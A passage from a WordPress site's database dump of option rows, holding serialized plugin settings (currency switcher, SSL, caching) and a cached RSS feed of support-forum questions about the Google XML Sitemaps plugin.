i:0;s:1:\"0\";i:1;s:1:\"0\";}s:8:\"currency\";a:2:{i:0;s:3:\"USD\";i:1;s:3:\"ZAR\";}s:12:\"currency_pos\";a:2:{i:0;s:10:\"left_space\";i:1;s:10:\"left_space\";}s:13:\"currency_rate\";a:2:{i:0;s:4:\"0.07\";i:1;s:1:\"1\";}s:17:\"currency_rate_fee\";a:2:{i:0;s:1:\"0\";i:1;s:1:\"0\";}s:17:\"currency_decimals\";a:2:{i:0;s:1:\"2\";i:1;s:1:\"2\";}s:15:\"currency_custom\";a:2:{i:0;s:0:\"\";i:1;s:0:\"\";}s:16:\"currency_default\";s:3:\"ZAR\";s:11:\"auto_detect\";s:1:\"0\";s:7:\"geo_api\";s:1:\"0\";s:13:\"enable_design\";s:1:\"1\";s:12:\"design_title\";s:20:\"Select your currency\";s:15:\"design_position\";s:1:\"1\";s:10:\"text_color\";s:7:\"#ffffff\";s:13:\"sidebar_style\";s:1:\"0\";s:10:\"main_color\";s:7:\"#f78080\";s:16:\"background_color\";s:7:\"#212121\";s:11:\"is_checkout\";s:1:\"1\";s:7:\"is_cart\";s:1:\"1\";s:16:\"conditional_tags\";s:0:\"\";s:11:\"flag_custom\";s:0:\"\";s:10:\"custom_css\";s:0:\"\";s:20:\"enable_multi_payment\";s:1:\"1\";}','yes'),(440899,'widget_wmc_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(440900,'widget_wmc_widget_rates','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(441287,'_transient_product-transient-version','1566830195','yes'),(442560,'layout_category_children','a:0:{}','yes'),(444378,'rlrsssl_options','a:15:{s:12:\"site_has_ssl\";b:1;s:4:\"hsts\";b:0;s:22:\"htaccess_warning_shown\";b:0;s:19:\"review_notice_shown\";b:0;s:25:\"ssl_success_message_shown\";b:1;s:26:\"autoreplace_insecure_links\";b:1;s:17:\"plugin_db_version\";s:5:\"3.2.5\";s:5:\"debug\";b:0;s:20:\"do_not_edit_htaccess\";b:0;s:17:\"htaccess_redirect\";b:1;s:11:\"ssl_enabled\";b:1;s:19:\"javascript_redirect\";b:1;s:11:\"wp_redirect\";b:1;s:31:\"switch_mixed_content_fixer_hook\";b:0;s:19:\"dismiss_all_notices\";b:0;}','yes'),(442794,'wpo_cache_config','a:16:{s:19:\"enable_page_caching\";s:1:\"1\";s:23:\"page_cache_length_value\";i:24;s:22:\"page_cache_length_unit\";s:5:\"hours\";s:17:\"page_cache_length\";i:86400;s:20:\"cache_exception_urls\";a:1:{i:0;s:0:\"\";}s:23:\"cache_exception_cookies\";a:1:{i:0;s:0:\"\";}s:30:\"cache_exception_browser_agents\";a:1:{i:0;s:0:\"\";}s:22:\"enable_sitemap_preload\";b:0;s:23:\"enable_schedule_preload\";s:1:\"0\";s:21:\"preload_schedule_type\";s:22:\"wpo_use_cache_lifespan\";s:21:\"enable_mobile_caching\";s:1:\"1\";s:19:\"enable_user_caching\";s:1:\"0\";s:8:\"site_url\";s:35:\"https://companyregistration.online/\";s:23:\"enable_gzip_compression\";s:1:\"1\";s:17:\"wpo_cache_cookies\";a:0:{}s:25:\"wpo_cache_query_variables\";a:0:{}}','yes'),(442795,'hurrytimer_db_version','1.0.0','yes'),(442796,'hurrytimer_version','2.2.8','yes'),(442836,'xl_track_day','6','no'),(442837,'xl_optin_ref','wc-settings','no'),(442828,'_xl_transient_finale_upsell_hold_time','a:2:{s:4:\"time\";i:1563915894;s:5:\"value\";s:3:\"yes\";}','no'),(442829,'finale_upsell_displayed','1','no'),(442830,'_xl_transient_nextmove_upsell_hold_time','a:2:{s:4:\"time\";i:1564952694;s:5:\"value\";s:3:\"yes\";}','no'),(442831,'nextmove_upsell_displayed','1','no'),(442835,'xlp_is_opted','yes','no'),(444097,'_transient_timeout_wc_product_loop_5ca9085808c97c502b70487f97a75868','1568639960','no'),(444098,'_transient_wc_product_loop_5ca9085808c97c502b70487f97a75868','a:2:{s:7:\"version\";s:10:\"1566047871\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:4:{i:0;i:28;i:1;i:30118;i:2;i:64;i:3;i:62;}s:5:\"total\";i:4;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:12;s:12:\"current_page\";i:1;}}','no'),(444044,'_transient_health-check-site-status-result','{\"good\":\"13\",\"recommended\":\"4\",\"critical\":\"0\"}','yes'),(444099,'_transient_timeout_wc_product_loop_a90790d02257de19cb5b44627ef36805','1568639961','no'),(444100,'_transient_wc_product_loop_a90790d02257de19cb5b44627ef36805','a:2:{s:7:\"version\";s:10:\"1566047871\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:6:{i:0;i:74;i:1;i:76;i:2;i:75;i:3;i:78;i:4;i:77;i:5;i:237;}s:5:\"total\";i:6;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:12;s:12:\"current_page\";i:1;}}','no'),(444101,'_transient_timeout_wc_product_loop_2c46863e11cd281358116fb4e9a7057e','1568639961','no'),(444102,'_transient_wc_product_loop_2c46863e11cd281358116fb4e9a7057e','a:2:{s:7:\"version\";s:10:\"1566047871\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:7:{i:0;i:31327;i:1;i:65;i:2;i:67;i:3;i:68;i:4;i:69;i:5;i:70;i:6;i:72;}s:5:\"total\";i:7;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:12;s:12:\"current_page\";i:1;}}','no'),(444103,'_transient_timeout_wc_product_loop_8c50fd83f5a372faf1a02d6d6f388d53','1568639961','no'),(444104,'_transient_wc_product_loop_8c50fd83f5a372faf1a02d6d6f388d53','a:2:{s:7:\"version\";s:10:\"1566047871\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:4:{i:0;i:28088;i:1;i:28090;i:2;i:28091;i:3;i:28092;}s:5:\"total\";i:4;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:12;s:12:\"current_page\";i:1;}}','no'),(444105,'_transient_timeout_wc_product_loop_dadbc313164541352826c9e793fb80df','1568639961','no'),(444106,'_transient_wc_product_loop_dadbc313164541352826c9e793fb80df','a:2:{s:7:\"version\";s:10:\"1566047871\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:3:{i:0;i:29681;i:1;i:80;i:2;i:29583;}s:5:\"total\";i:3;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:12;s:12:\"current_page\";i:1;}}','no'),(444107,'_transient_timeout_wc_product_loop_6726becfa70a9e0fa2565540ffcad299','1568639961','no'),(444108,'_transient_wc_product_loop_6726becfa70a9e0fa2565540ffcad299','a:2:{s:7:\"version\";s:10:\"1566047871\";s:5:\"value\";O:8:\"stdClass\":5:{s:3:\"ids\";a:1:{i:0;i:79;}s:5:\"total\";i:1;s:11:\"total_pages\";i:1;s:8:\"per_page\";i:12;s:12:\"current_page\";i:1;}}','no'),(455125,'_transient_timeout_feed_mod_d21d2a68bac70d38fb7f9a7bd3d1725e','1567288317','no'),(455126,'_transient_feed_mod_d21d2a68bac70d38fb7f9a7bd3d1725e','1566683517','no'),(444931,'spai_settings_noresize_selectors','','yes'),(444403,'rsssl_activation_timestamp','1563953597','yes'),(453890,'_site_transient_timeout_php_check_73ecd64509db505b6046b20394d377da','1567068636','no'),(453891,'_site_transient_php_check_73ecd64509db505b6046b20394d377da','a:5:{s:19:\"recommended_version\";s:3:\"7.3\";s:15:\"minimum_version\";s:6:\"5.6.20\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(454091,'_site_transient_update_themes','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1567020055;s:7:\"checked\";a:5:{s:14:\"ChildThemeDivi\";s:3:\"1.0\";s:4:\"Divi\";s:6:\"3.27.3\";s:14:\"twentynineteen\";s:3:\"1.4\";s:15:\"twentyseventeen\";s:3:\"2.2\";s:13:\"twentysixteen\";s:3:\"2.0\";}s:8:\"response\";a:0:{}s:12:\"translations\";a:0:{}}','no'),(456221,'_transient_timeout_et_core_version','1567078382','no'),(456222,'_transient_et_core_version','3.27.3','no'),(456337,'_transient_timeout_et_core_path','1567078382','no'),(456338,'_transient_et_core_path','/home/digit626/companyregistration.online/wp-content/themes/Divi/core','no'),(455123,'_transient_timeout_feed_d21d2a68bac70d38fb7f9a7bd3d1725e','1567288317','no'),(455124,'_transient_feed_d21d2a68bac70d38fb7f9a7bd3d1725e','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:5:\"\n\n	\n	\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:371:\"\n\n		\n		\n		\n		\n		\n		\n		\n\n		\n		\n			\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n							\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"WordPress.org Forums » [Google XML Sitemaps] Support\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/support/plugin/google-sitemap-generator/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 24 Aug 2019 21:50:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"https://bbpress.org/?v=2.6-alpha-6091\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:30:{i:0;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"https://wordpress.org/support/topic/how-to-include-pages-with-custom-query-vars-in-sitemap/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"How to include pages with custom query vars in sitemap\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"https://wordpress.org/support/topic/how-to-include-pages-with-custom-query-vars-in-sitemap/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 22 Aug 2019 14:41:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1277:\"\n						\n						<p>Replies: 0</p>\n						<p>Hi,</p>\n<p>First, thank you for your magnificent plugin. </p>\n<p>I created a custom query vars to filter posts by date, like this:</p>\n<pre><code>function sm_register_query_vars( $vars ) {\n    $vars[] = &#039;date&#039;;\n    return $vars;\n}\nadd_filter( &#039;query_vars&#039;, &#039;sm_register_query_vars&#039; );</code></pre>\n<p>then I created a rewrite rule to make this kind of slug seo friendly, like this:</p>\n<pre><code>function add_rewrite_rules($aRules) {\n$aNewRules = array(\n	&#039;^calendar/(.+?)/?&#039; =&gt; &#039;index.php?date=$matches[1]&#039;,\n);\n$aRules = $aNewRules + $aRules;\nreturn $aRules;\n}\nadd_filter(&#039;rewrite_rules_array&#039;, &#039;add_rewrite_rules&#039;);</code></pre>\n<p>And now I have many pages like this that are generated dynamically:</p>\n<p>mydomain.tld/calendar/YYYY-MM-DD/</p>\n<p>But as those pages are not a standard content&#8230; the plugin &#8220;Google XML Sitemaps&#8221; can not take them into consideration and cannot include them into sitemap.</p>\n<p>I did include some of them manually as &#8220;Additional Pages&#8221;, but as there are many of them, I am asking is there a programmatically way to add those kind of pages to sitemap.</p>\n<p>Thank you for your help.</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"charafweb\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"https://wordpress.org/support/topic/tons-of-sitemap-pt-post-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"Tons of &amp;#8220;/sitemap-pt-post-XXX&amp;#8221; errors on GSConsole, how to fix?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"https://wordpress.org/support/topic/tons-of-sitemap-pt-post-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 21 Aug 2019 16:27:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:402:\"\n						\n						<p>Replies: 0</p>\n						<p>Guys, since I delete this plugin I receive (it&#8217;s like a year now) lots of error on Google Search Console about these pages that doesn&#8217;t exist anymore. &#8211;&gt; </p>\n<p><a href=\"https://prnt.sc/ovp6l0\" rel=\"nofollow\">https://prnt.sc/ovp6l0</a></p>\n<p>Is there a way to fix this and maybe create a single redirect for all of them? </p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Jedi82\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/support/topic/google-not-indexing-my-sitemap/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"Google Not Indexing My Sitemap\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/support/topic/google-not-indexing-my-sitemap/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 19 Aug 2019 12:06:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:396:\"\n						\n						<p>Replies: 1</p>\n						<p>Hello, For the past 10 days since I switch my sitemap to Google Sitemap Generator, I have been having series of sleeplessness because all my contents have refused to be indexed and my blog is not making any sense. Google sitemap shows they are been crawled but not indexed. Could this be an issue caused by the generator or Google itself?</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Matent\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"https://wordpress.org/support/topic/google-is-trying-to-index-dashboard-pages/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"Google is Trying To Index Dashboard Pages\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"https://wordpress.org/support/topic/google-is-trying-to-index-dashboard-pages/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 18 Aug 2019 14:46:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:169:\"\n						\n						<p>Replies: 0</p>\n						<p>Google is trying to index my admin edit comments page. How can I exclude my back end admin pages from indexing?</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"ldorenfest\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"https://wordpress.org/support/topic/how-to-limit-number-of-entries-per-sitemap/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"How to limit number of entries per sitemap\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"https://wordpress.org/support/topic/how-to-limit-number-of-entries-per-sitemap/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 15 Aug 2019 03:35:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:206:\"\n						\n						<p>Replies: 0</p>\n						<p>Hello,</p>\n<p>I know 50,000 entries are limited to a single sitemap.</p>\n<p>How can I break it into 1000, like Yoast SEO does.</p>\n<p>Please advise.</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"hoanneothethao247\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wordpress.org/support/topic/draft-posts-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Draft posts\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wordpress.org/support/topic/draft-posts-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 08 Aug 2019 21:05:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:164:\"\n						\n						<p>Replies: 0</p>\n						<p>Hi,</p>\n<p>Does plugin add Draft posts to the map so we need to add drafts to exclude list?</p>\n<p>Thanks.</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"https://wordpress.org/support/topic/remove-woocommerce-core-pages-from-sitemap/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"Remove Woocommerce core pages from sitemap\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"https://wordpress.org/support/topic/remove-woocommerce-core-pages-from-sitemap/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 07 Aug 2019 16:55:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:257:\"\n						\n						<p>Replies: 0</p>\n						<p>Google XML Sitemaps automatically adds core woocommerce pages like &#8220;Checkout&#8221; &#8220;My account&#8221; and my custom 404 page to my XML sitemap.</p>\n<p>How can I prevent it from doing so?</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Simone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"https://wordpress.org/support/topic/products-categories-all-pages-page-1-page-2-for-cache-preloading/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"Products categories all pages /page/1 /page/2 &amp;#8230; for cache preloading\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"https://wordpress.org/support/topic/products-categories-all-pages-page-1-page-2-for-cache-preloading/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 06 Aug 